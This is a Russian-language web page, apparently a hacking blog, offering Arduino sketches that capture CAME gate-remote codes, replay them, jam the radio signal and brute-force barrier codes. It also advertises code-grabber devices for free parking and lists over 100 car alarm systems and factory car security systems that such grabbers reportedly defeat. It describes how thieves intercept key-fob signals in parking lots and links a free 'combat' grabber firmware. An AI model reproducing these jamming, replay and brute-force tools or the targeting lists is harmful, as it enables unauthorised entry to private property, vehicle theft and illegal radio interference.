Кодграббер Из Ардуино: Приложение Для Кодграббера Из Ардуино, Ардуино Кодграббер – Arduino Hack

Универсальный кодграббер Пандора с 7 режимами работы и наибольшим числом автомобильных сигнализаций

В этой статье разберем:

1. Как считать код пульта.
2. Как послать код с arduino на открытие шлагбаума
3. Как заглушить сигнал
4. Как перебором подобрать код для открытия шлагбаумаю

Ссылка на приемник и передатчик: http://ali.ski/S699Bv
Ссылка на пульт came: http://ali.ski/-jEW2

1. скетч на считывание кода с пульта:

#define RX 2 #define TIMER_DIV volatile byte level=255; volatile unsigned long last, len; byte p_level; unsigned long p_len, p_len_prev; struct { uint8_t state; uint8_t data[3], dat_bit; } came; void set_bit(uint8_t *data, uint8_t n) { data[n/8]|=1<<(n%8); } #define CM_MAX_TE 450 #define CM_MIN_TE 250 #define CM_BITS12 12 #define CM_BITS24 24 void process_came() { unsigned char b; switch(came.state) { case 0: if(p_level) break; came.state=1; break; case 1: //start if(!p_level) break; else if(p_len>=CM_MIN_TE && p_len<=CM_MAX_TE) { came.state=2; came.dat_bit=0; came.data[0]=0x00; came.data[1]=0x00; came.data[2]=0x00; } else came.state=0; case 2: //dat if(p_level) { if(came.dat_bit==CM_BITS24) { came.state=0; break; } if(p_len_prev<=CM_MAX_TE && p_len_prev>=CM_MIN_TE && p_len<=CM_MAX_TE*2 && p_len>=CM_MIN_TE*2) b=0; else if(p_len_prev<=CM_MAX_TE*2 && p_len_prev>=CM_MIN_TE*2 && p_len<=CM_MAX_TE && p_len>=CM_MIN_TE) b=1; else { came.state=0; break; } if(b) set_bit(came.data, came.dat_bit); came.dat_bit++; break; } else { if((p_len>5000)&&(came.dat_bit==CM_BITS12 || came.dat_bit==CM_BITS24)) came.state=100; } break; } } void dump_hex(byte *buf, byte bits) { byte b; for(b=0; b>(bits+7)/8; b++) { if(buf[b]>0x0f) Serial.print(‘0’); Serial.print(buf[b], HEX); Serial.print(” “); } Serial.println(“”); } void rx_int() { if(level!=255) return; len=micros()-last; last=micros(); if(digitalRead(RX)==HIGH) level=0; else level=1; } void setup() { attachInterrupt(0, rx_int, CHANGE); Serial.begin(115200); while(!Serial); Serial.println(“MEGA ARDUINO LOGGER”); Serial.println(“”); interrupts(); } byte b; void loop() { if(level!=255) { noInterrupts(); p_level=level; p_len=len; len=0; level=255; interrupts(); process_came(); p_len_prev = p_len; } if(came.state==100) { Serial.print(came.data[0],HEX); Serial.print(came.data[1],HEX); Serial.print(came.data[2],HEX); //Serial.print(“CAME[“); Serial.print(“came[“); Serial.print(came.dat_bit); Serial.print(“]: “); dump_hex(came.data, came.dat_bit); came.state=0; } }

2.Посылаем код с помощью передатчика:

#define txPin 8#define Te 320void setup(){ pinMode(txPin, OUTPUT);}void loop(){ SendCame(0b111111111111);}void SendCameBit(byte b){ delayMicroseconds(Te); if (!b) digitalWrite(txPin,HIGH); delayMicroseconds(Te); digitalWrite(txPin,HIGH); delayMicroseconds(Te); digitalWrite(txPin,LOW);}void SendCame(long Code){ for (int j=0;j<5;j++) // посылку посылаем как и брелок – 4 раза подряд. { digitalWrite(txPin,HIGH); delayMicroseconds(Te); digitalWrite(txPin,LOW);// посылаем стартовый импульс for (byte i=12;i>0;i–){ SendCameBit(bitRead(Code, i-1)); // побитово перебираем и посылаем код } delay(16); } delay(2000); // сделать паузу после посылки на 2 с}

3. Делаем глушилку сигнала:

void setup() { pinMode(8, OUTPUT); }void loop() {digitalWrite(8, HIGH);delayMicroseconds(500);digitalWrite(8, LOW);delayMicroseconds(500);}

4. Делаем перебор кодов пульта от шлагбаумов Came:

#define txPin 8#define Te 320int led = B00000001;int led2 = B1000;void setup(){ pinMode(txPin, OUTPUT);} void loop(){ // SendCame(0b100010001111); // delay(2000); // SendCame((B1110 * 256) + B10101010); // delay(5000); SendCame((led2 * 256) + led); led = led + B1; // delay(1000); if (led==11111111) {led2 = led2 + B1; }} void SendCameBit(byte b){ delayMicroseconds(Te); if (!b) digitalWrite(txPin,HIGH); delayMicroseconds(Te); digitalWrite(txPin,HIGH); delayMicroseconds(Te); digitalWrite(txPin,LOW);} void SendCame(long Code){ for (int j=0;j<5;j++) // посылку посылаем как и брелок – 4 раза подряд. { digitalWrite(txPin,HIGH); delayMicroseconds(Te); digitalWrite(txPin,LOW);// посылаем стартовый импульс for (byte i=12;i>0;i–){ SendCameBit(bitRead(Code, i-1)); // побитово перебираем и посылаем код } delay(16); } delay(500); // сделать паузу после посылки на 2 с}

Ссылка на архив со скетчами:  https://yadi.sk/d/vywdKVjN39qYt5

Видео:

Кодировка NICE FLOR-SКодировка NICE FLOR-S

wil-21

Одна из самых распространенных кодировок – встречается на форуме в таких изделиях как ИМИТАТОР от CodePerfect на железе Олега,  МЕГА-АНАЛИЗАТОР от RUSSO_TURISTO, в прошивке Joker для железа Олега, в прошивках  для ZX940.

В большинстве изделий представляет собой или случайный выброс шифрованной части (hop) (имитацию) сигнала или просто определение типа кодировки.

Вопрос – возможно ли воспроизвести сигнал открытия автоматике nice flor-s обычными средствами – т.е. без обращения к китайцам для распила проца чтобы узнать хитрый алгоритм?

(далее…)

Code Grabber — что это?

Кодграббер для авто применяется для обмана электронной системы защиты от угона транспортного средства. Такие средства придуманы изначально с хорошей целью — получать доступ к автомобилю сотрудникам сервисных служб в случае поломок и отказа сигнализации подчиняться командам брелка. Затем их начали приобретать угонщики самих машин или просто для открытия авто и кражи различных вещей, находящихся в салоне.кодграбберНа крупных стоянках стоят люди с устройствами кодграбберами и ждут, когда владелец автомобиля нажмет на кнопку постановки сигнализации. Они также активируют граббер в момент активации автомобильной сигнализации и электронное устройство «вор кода» запоминает посылаемый брелком код, которым можно воспользоваться потом для вскрытия авто.

Почти все виды автомобильных сигнализаций не могут защититься от считывания кода посторонним устройством. Возможно, самые дорогие марки и модели сигналок имеют специальное шифрование, которое способно маскировать свои передаваемые и получаемые сигналы.

Так как радиус действия кодграббера 150 метров, то поймать человека с граббером трудно, тем более в центре густонаселенного города.

Теперь у вас будет
БЕСПЛАТНАЯ ПАРКОВКА ВЕЗДЕ!

  • Удобное использование на расстоянии до 100 метров
  • 25 ячеек памяти для записи сигналов
  • Поддерживает все известные модели шлагбаумов и ворот
  • Экономия на парковке
    до 3000 руб. в месяц!

Android + КодграбберAndroid + Кодграббер

1Сегодня я хочу предложить фрикерскому сообществу приложение KG Control для android смартфонов, при помощи которого можно будет управлять грабом без проводов, только по средствам bluetooth.

Нам понадобятся следующие вещи:
— смартфон с Android’ом 4.0.3 и выше.
— Arduino Nano (ATmega328)
— блютус модуль(например, я использовал HC-05)
— приёмник и передатчик
— светодиоды и резисторы

(далее…)

А вы хотите бесплатно парковаться на закрытых стоянках?

Универсальный пульт-сканер – уникальное устройство, которое позволяет копировать сигнал для автоматических ворот и шлагбаумов и впоследствии его воспроизводить (в том числе динамический сигнал).

Это даст вам возможность открывать любые автоматические ворота и шлагбаумы с одного пульта.

Пульт сканер для ворот и шлагбаумов Unigate

Измерение времени слепоты приемникаИзмерение времени слепоты приемника

При изготовлении устройства 409, 502, возникает по сути единственная сложность, это ослепление приемника после глушения. Это явление вызвано тем, что после «глушения» есть промежуток времени когда приемник не способен принимать сигнал, потому что, его чувствительность резко упала (характерно не для всех приемников). Это очень неприятно, во-первых сбивается синхронизация приема, а во-вторых время «слепоты» может быть слишком большое.
0
Для эффективного использования методов 409 и 502, необходимо знать время «слепоты» (или время восстановления после глушения) своего устройства. Про мой способ замера и пойдет речь в этой статье.
(далее…)

Как взламывают сигнализацию с диалоговой схемой защиты

Кодграббер третьего типа — алгоритмический (мануфактурный), как раз и предназначен для снятия с охраны машин с диалоговой схемой сигнализации.

Такой сканер кодов сигнализации перехватывает сигнал с брелка сигнализации с диалоговой схемой. Кодграббер (сканер) вычисляет производителя этой автомобильной охранной системы. У граббера есть заводские коды разных производителей и он подбирает их. Заводские коды получают из-за утечек от производителей охранных систем.

Помимо профессиональных способов взламывания транспортных средств, существуют и любительские варианты открытия автомобилей без ключа, которые были придуманы водителями, забывшими ключи в салоне или сел аккумулятор и замерз замок.

Универсальным мануфактурным кодграббером можно взломать более 100 видов сигнализаций:

  1. Sherif ( весь модельный ряд keeloq) автозапуск.
  2. Alligator (все дополнительные брелки keeloq)
  3. A.P.S. (весь модельный ряд keeloq)
  4. Jaguar (весь модельный ряд keeloq jx-2000 итд)
  5. Alligator ( пейджеры с жк дисплеем все keeloq )
  6. Alligator (пейджеры со светодиодами все keeloq)
  7. Chelendger ( весь модельный ряд keeloq ch-7000i)
  8. Pantera- (QX)
  9. Mongouse
  10. GUARD ( брелоки с красным светодиодом keeloq)
  11. Duplex
  12. Pantera (SX)
  13. Fighter
  14. Cenmax (HIT-320 keeloq модели)
  15. Pantera (с пейджерами обратной связи по 5ХХХ серию включительно )
  16. Faraon
  17. KGB (дополнительные брелки включая старые модели)
  18. Berhut (дополнительные брелки)
  19. Berkut (пейджеры)
  20. KGB (пейджеры с обратной связью, проверенно на-VS 4000)
  21. Tomahawk(TW7000 TW9000,TW9010,TW7010,TW7020,TW7030,TW9020,TW9030,950LE) автозапуск.
  22. Godzila
  23. Pandora (серия RX)
  24. Leopard
  25. Red Scorpio
  26. Inspektor
  27. Cenmax-MT7
  28. Cenmax (A-700 A-900)
  29. Cenmax (VT-200,VT-210)
  30. CENMAX VIGILANT ST-5, ST-7, ST-10, V-7, MT-8 автозапуск.
  31. StarLine-Twage А6,А8,А9, автозапуск.
  32. StarLine-Twage В6(черный брелок) автозапуск.
  33. StarLine-Twage В6(доп.брелок) автозапуск.
  34. StarLine-TwageВ6 (синий пейджер ) автозапуск.
  35. StarLine-Twage В9(черный пейджер) автозапуск.
  36. StarLine-Twage В9 (доп.брелок)
  37. StarLine 24V
  38. StarLine-Twage А4,A2 автозапуск.
  39. FANTOM F-731, F-635LCD
  40. KGB ( FX-3,FX-5, FX-7)
  41. REEF (с красным светодиодом)
  42. Gorgon (с красным светодиодом)
  43. Black-Bug super (с красным светодиодом)
  44. Fortress(частично)
  45. StarLine-Twage В9(диалоговый синий пейджер)
  46. Eaglemaster
  47. TIGER keeloq Tiger QS, Tiger MM1
  48. Partisan
  49. Pantera (с пейджерами обратной связи c новой кодировкой серии SLK-350 SC-SLK-675 RS включительно )
  50. Alligator(с пейджерами обратной связи c новой кодировкой серии S-400 2WAY — S-875 RS 2WAY)
  51. Sherif (с номым динамическим кодом CFM модели с ZX-1055, ZX-1060 ) автозапуск.
  52. Challenger новые модели с измененым кодом CFM модели ch8000i, x-1.
  53. Daewoo Nexia штатная сигнализация
  54. Huindai доставная сигнализация
  55. Mystery (пейджер со светодиодами) MX-503, MX-505
  56. Leopard LS новые модели с измененым кодом. автозапуск.
  57. Tomahawk X3 итд серия Х автозапуск.
  58. Top Guard
  59. APS2800
  60. Sher-Khan AM А (автозапуск),В,Vegas .
  61. APS 7000-9000
  62. Sheriff zx730,zx750 (с номым динамическим кодом CFM2 ) автозапуск.
  63. Challenger (с номым динамическим кодом CFM2 ) автозапуск.
  64. Harpoon H1, H2
  65. AME-MM2 Type2 автозапуск.
  66. Bagira MS AME-002
  67. DaVinci codeice 7k1,K9.1 итд автозапуск.
  68. Mystery пейджеры mx-605, mx-605RS, mx-705
  69. Mystery дополнительные брелки mx-605, mx-605RS,607,705,905,905RS.
  70. Mystery пейджеры mx-605, mx-605RS, 607,705, 905, 905RS
  71. Convoy XS
  72. Pantera CLK 355
  73. Mangust EMS 1.7, 1.9, 1.7R, 1.9R автозапуск.
  74. Jaguar EZ-Betta, EZ-Alpfa
  75. Black-Bug (зеленый светодиод)
  76. Anaconda
  77. Tomahawk TZ
  78. Subaru ,Tribeca B9,Outback,Forester,Impreza, Legacy (без смартов)to 2010year — ШТАТКА
  79. Sherif 999 (новый модельный ряд)
  80. KLIFFORD 1998 — алгоритм
  81. KLIFFORD 1996 — статика
  82. SIRIO 777
  83. EXCALIBUR
  84. TAMPERS
  85. Reef (зеленый светоиод)
  86. ZORRO
  87. OMEGA
  88. ENFORCER
  89. Visonic
  90. ROLLINS
  91. PRESTIGE
  92. Whister
  93. AL998RS RT
  94. SKUNET
  95. TR03B1
  96. Bagira
  97. APS 2700,2800,2900 Новый модельный ряд
  98. Tiger EMS 1.7R, 1.9R
  99. jaguar серия ja,jb
  100. Sheriff zx-930 Новый модельный ряд
  101. Sheriff 940, 950.

Может вскрывать штатные охранные системы следующих автомобилей:

  1. LEXUS RX 300, 470, (ШТАТКА европа) работает 50 на 50 открыть можно 2-3 раза
  2. ТОЙОТА крузер 100, (ШТАТКА европа) работает 50 на 50 открыть можно 2-3 раза
  3. Toyota Kamri (ШТАТКА европа2004г.)
  4. Toyota Prado. (ШТАТКА европа) работает 50 на 50 открыть можно 2-3 раза
  5. Toyota RAV4 (ШТАТКА европа) работает 50 на 50 открыть можно 2-3 раза
  6. AUDI A4, A6 , A8, TT ШТАТКА (проверено по 2004г но только европа,на экспортные 434,42MHz не распостраняется).
  7. VOLVO
  8. Subaru.

Кодграббер CameКодграббер Came

Приветствую всех и поздравляю с 2012!

С каждым годом вопрос парковки становится все актуальнее, на дворовых территориях и в проездах устанавливаются шлагбаумы, парковочные места ограждаются цепочками и барьерами, и за частую найти парковочное место даже на несколько минут достаточно сложно. Одной из самых распространенных систем в этой отрасли является Came, которая производит шлагбаумы, ворота, цепочки, барьеры и многое другое.

Дистанционное управление осуществляется с помощью специальных пультов, которые командой по радиоканалу в определенном формате управляют например шлагбаумом. Дело в том, что перехватив такую команду всего один раз, мы сможем управлять шлагбаумом когда нам это будет необходимо )) (далее…)

Starduino (или Arduino + StarLine)Starduino (или Arduino + StarLine)

В этой статье будет рассказано как на основе популярной платформы Arduino сделать кодграббер для StarLine.

Несколько месяцев назад, впервые только заинтересовавшись изучением уязвимостей, в тот момент меня интересовали только шлагбаумы, которых поставили много и не проехать и не запарковать машину в центре города, я натолкнулся на ряд интересных тем. Особенно меня заинтересовал проект tahion`а. USB универсальный, можно перепрограммировать под что угодно и т.д.  Это был мой первый девайс, который мне собрали друзья. (далее…)

Иммобилайзер — защита от угона

С англ. переводится как обездвиживатель. Immobilizer — вид электронного средства от угона. Он блокирует какую-то деталь или узел конструкции автомобиля, например, препятствует передачи электроэнергии на обычный или редукторный стартер или бензонасос, или зажигание. Иммобилайзер размыкает какую-либо цепь ответственно важных устройств для запуска и движения автомобиля. Блокировка или разблокировка осуществляется специальным ключом или брелком.

Существуют иммобилайзеры, которые дают возможность завести автомобиль, а после они блокируют какое-либо устройство и включают звуковой сигнал. Звук включается, чтобы у угонщика не было времени отключить иммо.

Формат пакета CFM / CFM IIФормат пакета CFM / CFM II

Пакет состоит из 65 — 66 бит, первый бит стартовый, потом 64 бита данных, остальное можно не принимать, последний бит — флаг конца пакета, возможно у некоторых ещё передаётся бит разряда батарейки, по аналогии с KeeLoq.

 

Вначале пакета идёт преамбула — меандр 600 мкс. Далее хедер — 2400/1000 мкс, встречал 2400/700 мкс. Первый бит — нулевой — он же стартовый.  Нулевые биты 600/600 мкс, единицы 1000/1000 мкс.

Обсуждение тут.

Алгоритмический кодграббер в брелоке с рабочим дисплеемАлгоритмический кодграббер в брелоке с рабочим дисплеем

Алгоритмический кодграббер своими руками в брелоке с рабочим дисплеем, бесплатная боевая прошивка.

Это прошивка алгоритмического кодграббера для брелока Sheriff ZX 750. Никаких переделок внутри брелока не требуется, дисплей рабочий, 3 ячейки памяти, микроконтроллер PIC16F914.

Внутри зашит мануфактурный код мангуста (Mongoose), это версия 1.1. Во второй версии будет возможность вписывать свои ключи в EEPOM.

(далее…)

Видео

В этом видео показывается как работать с кодграббером сигнализаций.

В этом видео в кадр попал вор, который использовал кодграббер.

Полезные советы: как защитить от кодграббера.

Если вместо ворот стоит шлагбаум, как его открыть?

Code Grabber Pandora (Пандора) для шлагбаумов и ворот.

Некоторые предпочитают делать кодграбберы своими руками.

Автор публикации

15
Комментарии: 25Публикации: 324Регистрация: 04-03-2016
Рейтинг
( 1 оценка, среднее 5 из 5 )
Загрузка ...